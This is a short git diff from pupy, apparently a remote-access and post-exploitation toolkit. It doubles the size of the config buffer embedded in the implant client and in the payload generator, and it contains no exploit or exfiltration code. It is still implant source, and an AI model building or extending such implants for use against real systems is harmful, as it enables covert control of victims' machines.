diff --git a/client/sources-linux/pupy.c b/client/sources-linux/pupy.c index 8b5554e0..620a9d26 100644 --- a/client/sources-linux/pupy.c +++ b/client/sources-linux/pupy.c @@ -28,7 +28,7 @@ int linux_inject_main(int argc, char **argv); static const char module_doc[] = "Builtins utilities for pupy"; -static const char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; +static const char pupy_config[65536]="####---PUPY_CONFIG_COMES_HERE---####\n"; static PyObject *ExecError; diff --git a/client/sources/pupy.c b/client/sources/pupy.c index fc96d119..f5ff73cd 100644 --- a/client/sources/pupy.c +++ b/client/sources/pupy.c @@ -20,7 +20,7 @@ static char module_doc[] = "Builtins utilities for pupy"; UINTPTR _load_dll(const char *name, const char *bytes); -char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n"; //big array to have space for more config / code run at startup. scriptlets also takes more space ! +char pupy_config[65536]="####---PUPY_CONFIG_COMES_HERE---####\n"; //big array to have space for more config / code run at startup. scriptlets also takes more space ! static PyObject *ExecError; diff --git a/pupy/pupygen.py b/pupy/pupygen.py index 70c2c884..f45f0e25 100755 --- a/pupy/pupygen.py +++ b/pupy/pupygen.py @@ -30,7 +30,7 @@ import getpass import json ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__))) -HARDCODED_CONF_SIZE=32768 +HARDCODED_CONF_SIZE=65536 def check_templates_version(): try: